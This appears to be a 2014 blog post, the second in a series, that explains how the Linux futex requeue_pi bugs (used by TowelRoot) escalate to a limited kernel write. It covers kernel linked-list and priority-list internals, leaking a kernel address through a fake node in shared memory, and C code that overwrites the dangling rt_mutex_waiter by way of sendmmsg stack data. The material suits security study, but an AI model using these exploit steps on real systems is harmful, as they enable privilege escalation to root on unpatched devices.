Escalating Futex Vulnerability & How to Fix it

September 18th, 2014


Link to part 1 of the series: The futex vulnerability

Last time we went over the two bugs in the kernel's futex code and how these bugs allow us to potentially control a node in a kernel-residing linked list.

This time, we'll discuss how to leverage these bugs in order to achieve a limited form of kernel write, or to be more precise: "write an uncontrolled value to a controlled address". Before we continue, there are some concepts you ought to be familiar with: doubly-linked lists and priority lists (plists) in the Linux kernel.


Doubly-Linked List 

I will assume you are familiar with the concept of linked lists; if not, I suggest reading the Wikipedia entry.

Now, the way linked lists are implemented in the kernel is somewhat unique. Usually, you'd find nodes where the next and prev pointers sit alongside the data as ordinary members of the node. In the Linux kernel, by contrast, include/linux/list.h defines a list_head structure which is embedded into various data structures and serves as a generic chain link. This way, a single data structure can act as a node in several linked lists at once.

The definition of list_head is quite simple (as found in include/linux/types.h):

struct list_head {
    struct list_head *next, *prev;
};


One more thing about this kernel implementation of linked lists: they are always circular. A node is initialized to point to itself (both next and prev), and inserting/removing nodes never breaks the circle.
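To make the embedding idea concrete, here is a minimal sketch of a structure joining such a list. struct example_item and example_usage are illustrative names of my own; the macros and helpers are the kernel's, from include/linux/list.h:

#include <linux/kernel.h>
#include <linux/list.h>
#include <linux/slab.h>

struct example_item {              /* illustrative data structure */
    int id;
    struct list_head link;         /* the embedded chain link */
};

static LIST_HEAD(example_list);    /* head, initialized to point to itself */

static void example_usage(void)
{
    struct example_item *item = kmalloc(sizeof(*item), GFP_KERNEL);
    struct example_item *iter;

    item->id = 42;
    list_add_tail(&item->link, &example_list);  /* insert just before the head */

    list_for_each_entry(iter, &example_list, link)
        pr_info("item %d\n", iter->id);         /* container recovered via container_of */

    list_del(&item->link);                      /* unlinking keeps the list circular */
    kfree(item);
}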

Priority List

Priority lists are slightly more complicated creatures. The idea is to let each node carry a numeric priority, and to guarantee that inserting/removing items always leaves the list ordered (from low to high priority).

Just as list_head is a structure one can embed in data nodes to link them into plain lists, plist_node can be embedded in data nodes to specify their membership in priority lists. The definition of plist_node is (taken from include/linux/plist.h):

struct plist_node {
    int prio;
    struct list_head prio_list;
    struct list_head node_list;
};

Another thing to note is that plists are always accessed via a head structure, which is just a wrapper around a list_head pointing to the first node on node_list:

struct plist_head {
    struct list_head node_list;
};

As you can see, a priority list essentially consists of two linked lists. This requires some explanation.

I'll begin with node_list: this is simply a linked list of all the nodes in the plist, sorted by priority. prio_list, on the other hand, contains only one node of each priority, again sorted by priority.

Take for example the following list:

[Diagram: an example priority list; every node is linked on node_list in priority order, while only the first node of each priority also appears on prio_list]
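Since the original figure did not survive, here is a small sketch that builds such a list with the kernel's plist API (from include/linux/plist.h); the node names and priorities are made up purely for illustration:

#include <linux/plist.h>

static struct plist_head example_head;
static struct plist_node a, b, c, d, e;

static void plist_example(void)
{
    plist_head_init(&example_head);

    plist_node_init(&a, 5);
    plist_node_init(&b, 5);
    plist_node_init(&c, 7);
    plist_node_init(&d, 9);
    plist_node_init(&e, 9);

    plist_add(&a, &example_head);
    plist_add(&b, &example_head);
    plist_add(&c, &example_head);
    plist_add(&d, &example_head);
    plist_add(&e, &example_head);

    /* node_list now chains a -> b -> c -> d -> e (every node, sorted by prio),
     * while prio_list chains only a -> c -> d (one node per distinct priority). */
}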

There are two possible cases of inserting a new node to the plist:

  • There is no node with the same priority in the list
  • There is already a node of the same priority in the list

Same goes for removing a node:

  • There are additional nodes with the same priority
  • The node removed is the last with its priority

Now that we've got that out of the way, let's review the futex bug and what it gives us.

In the kernel, when a futex lock is contended, the lock object (an rt_mutex) has a priority list of rt_mutex_waiter objects associated with it:

struct rt_mutex {
    raw_spinlock_t wait_lock;
    struct plist_head wait_list;     /* The "head" of a priority list of rt_mutex_waiter objects */
    struct task_struct *owner;
};

struct rt_mutex_waiter {
    struct plist_node list_entry;    /* This is the node that forms part of rt_mutex's wait_list */
    struct plist_node pi_list_entry;
    struct task_struct *task;
    struct rt_mutex *lock;
};

Now, if you recall, when we call futex_requeue the first time, it adds the rt_waiter, which resides in the stack frame of futex_wait_requeue_pi, to the wait_list of lock B:

/* kernel/futex.c */
static int futex_requeue(u32 __user *uaddr1, unsigned int flags,
                         u32 __user *uaddr2, int nr_wake, int nr_requeue,
                         u32 *cmpval, int requeue_pi)
{
    /* ... */
    ret = rt_mutex_start_proxy_lock(&pi_state->pi_mutex,
                                    this->rt_waiter,
                                    this->task, 1);
    /* ... */
}

/* kernel/rtmutex.c */
int rt_mutex_start_proxy_lock(struct rt_mutex *lock,
                              struct rt_mutex_waiter *waiter,
                              struct task_struct *task, int detect_deadlock)
{
    /* ... */
    ret = task_blocks_on_rt_mutex(lock, waiter, task, detect_deadlock);
    /* ... */
}

static int task_blocks_on_rt_mutex(struct rt_mutex *lock,
                                   struct rt_mutex_waiter *waiter,
                                   struct task_struct *task,
                                   int detect_deadlock)
{
    /* ... */
    plist_add(&waiter->list_entry, &lock->wait_list);
    /* ... */
}

When we call futex_requeue the second time, we cause futex_wait_requeue_pi to return without removing rt_waiter from the list.

In essence, the waiter list will look like this:

[Diagram: lock B's wait_list after the second requeue, with the bugged waiter left dangling]

Notice how in the last diagram the pointer arrows to the bugged waiter are no longer bi-directional. There are nodes in the waiter list which point to the bugged waiter’s node, but it points to some other place.

Info Leak

Here is where things start to get interesting (and also where my insistence on explaining how priority lists work becomes apparent).

Insertion in a priority list works by scanning the list (starting from plist_head) until a node with a priority larger than the inserted node's is encountered. Then, the node is inserted before that node:

void plist_add(struct plist_node *node, struct plist_head *head)
{
    /* ... scan for the insertion point, see the sketch below ... */
ins_node:
    list_add_tail(&node->node_list, node_next);
    /* ... */
}

The reason this is useful is that list_add_tail inserts the new node between the given node and that node's prev. In our case, the bugged node's next can be set to point to an arbitrary memory address.
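It helps to see what list_add_tail actually does. It is a thin wrapper around __list_add (both in include/linux/list.h, shown here in their non-debug variants):

/* include/linux/list.h (non-debug variant) */
static inline void __list_add(struct list_head *new,
                              struct list_head *prev,
                              struct list_head *next)
{
    next->prev = new;   /* write into the node we are inserting before */
    new->next = next;
    new->prev = prev;
    prev->next = new;   /* write into the node read from next->prev */
}

static inline void list_add_tail(struct list_head *new, struct list_head *head)
{
    __list_add(new, head->prev, head);
}

Note that two of the four stores write through pointers we get to choose: next is the address taken from the bugged node, and prev is whatever that memory claims its predecessor is.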

You can probably see where this is going. We can force next to point to memory that is shared between user space and the kernel, where we have crafted our own node and its preceding node:

[Diagram: the bugged waiter's next pointer redirected to a fake node and its preceding node, both crafted in user/kernel shared memory]

After adding a new waiter to the list via futex_lock_pi from a thread with a controlled priority, we can make it insert itself right before the fake node, so the list will look like this:

[Diagram: the wait_list after futex_lock_pi, with the new waiter linked in just before the fake node]
Lo and behold, we have an object in the kernel whose address is visible from user space!
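In practice, reading the leak back is as simple as looking at the fake node in the shared mapping after the insertion. A minimal sketch, assuming fake_waiter is the pointer into shared memory used in the sendmmsg snippet further down, and that the kernel struct layouts are mirrored in user space:

/* After futex_lock_pi has linked a real waiter in front of our fake node,
 * the fake node's prev pointers hold kernel (stack) addresses. */
void *leaked = fake_waiter->list_entry.node_list.prev;

struct rt_mutex_waiter *kstack_waiter =
    (struct rt_mutex_waiter *)((char *)leaked -
        offsetof(struct rt_mutex_waiter, list_entry.node_list));

printf("real rt_mutex_waiter lives at %p in kernel space\n",
       (void *)kstack_waiter);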

The way we overwrite the bugged rt_waiter is by invoking a blocking system call immediately after futex_wait_requeue_pi returns to user space. What we require of this system call is:

  • Its stack frame is deep enough to overwrite the interesting parts of rt_waiter
  • We can control the data in the stack frame of that system call

As luck would have it, there are several such system calls. The ones used in TowelRoot are sendmsg, sendmmsg, recvmsg and recvmmsg. We'll pick sendmmsg.

The invocation of sendmmsg and associated structures are as follows:

int sendmmsg(int sockfd, struct mmsghdr *msgvec, unsigned int vlen,
             unsigned int flags);

struct mmsghdr {
    struct msghdr msg_hdr;
    unsigned int msg_len;
};

struct msghdr {
    void *msg_name;
    socklen_t msg_namelen;
    struct iovec *msg_iov;
    size_t msg_iovlen;
    void *msg_control;
    size_t msg_controllen;
    int msg_flags;
};

struct iovec {
    void *iov_base;
    __kernel_size_t iov_len;
};

Playing a bit with gdb, we can see that in the stack frame of ___sys_sendmsg, the address range of the dangling rt_waiter overlaps with both iovstack and address like this (I cut away the uninteresting parts):

[Diagram: gdb view of the ___sys_sendmsg stack frame, showing the dangling rt_waiter overlapping the local iovstack and address buffers]

Now, address is copied from the buffer supplied in msgvec[0].msg_hdr.msg_name, while iovstack is copied from msgvec[0].msg_hdr.msg_iov. This means our setup ought to look like this:

/* Assume that:
 * 1. The socket (sock) has already been set up and connected.
 * 2. fake_waiter is a pointer to shared memory.
 */
int i = 0;
struct mmsghdr msgvec[1];
struct iovec msg_iov[8];
char databuf[128];
struct rt_mutex_waiter *k_waiter;

memset(databuf, 0, sizeof(databuf));

/* Load up msg_iov with legal values */
for (i = 0; i < __count_of(msg_iov); ++i) {
    /* The address loaded to iov_base should be of a mapped memory
     * area, otherwise the kernel will freak out over it */
    msg_iov[i].iov_base = (void *)&fake_waiter;
    msg_iov[i].iov_len = 0x10;
}

/* The top 8 bytes of address overlap with rt_waiter.list_entry.prio and
 * rt_waiter.list_entry.prio_list.next */
k_waiter = (struct rt_mutex_waiter *)(databuf + sizeof(databuf) - 8);
k_waiter->list_entry.prio = 120 + 12; /* Preserve the node's priority */
k_waiter->list_entry.prio_list.next = &fake_waiter->list_entry.prio_list;

/* Now we set up the structure that gets passed to sendmmsg */
msgvec[0].msg_hdr.msg_name = databuf;
msgvec[0].msg_hdr.msg_namelen = sizeof(databuf);
msgvec[0].msg_hdr.msg_iov = msg_iov;
msgvec[0].msg_hdr.msg_iovlen = __count_of(msg_iov);
msgvec[0].msg_hdr.msg_control = NULL;
msgvec[0].msg_hdr.msg_controllen = 0;
msgvec[0].msg_hdr.msg_flags = 0;
msgvec[0].msg_len = 0;

sendmmsg(sock, msgvec, __count_of(msgvec), 0);

Kernel Write

Using the same trick, we can overwrite the bugged waiter object with kernel addresses (now that we have an anchor address, it is relatively easy to pinpoint specific data in the kernel) and trigger another insertion.

This time, instead of writing to shared memory, we trick the kernel into writing to kernel memory.
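To sketch the idea, reusing the variables from the sendmmsg snippet above (kernel_target is a hypothetical kernel address of our choosing; picking the actual target is the subject of the next post):

/* Second sendmmsg overwrite of the dangling waiter: same setup as before,
 * except the crafted next pointer is now a kernel address rather than the
 * fake node in shared memory. */
k_waiter->list_entry.prio_list.next = (struct list_head *)kernel_target;

/* Triggering one more insertion via futex_lock_pi then makes plist_add and
 * __list_add treat kernel_target as a list node and link the new waiter
 * "before" it, so one of the prev/next stores writes the new waiter's
 * kernel (stack) address into memory we chose: an uncontrolled value
 * written to a controlled address, as promised at the top of the post. */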

Now that we've covered how the futex bugs can be escalated to a limited form of kernel read/write, we can start thinking about how to use these building blocks to achieve arbitrary kernel read/write and, ultimately, root access.

Next time we'll discuss how to use this memory write ability, limited as it is, to achieve full-blown kernel read/write access and ultimately gain root permissions.
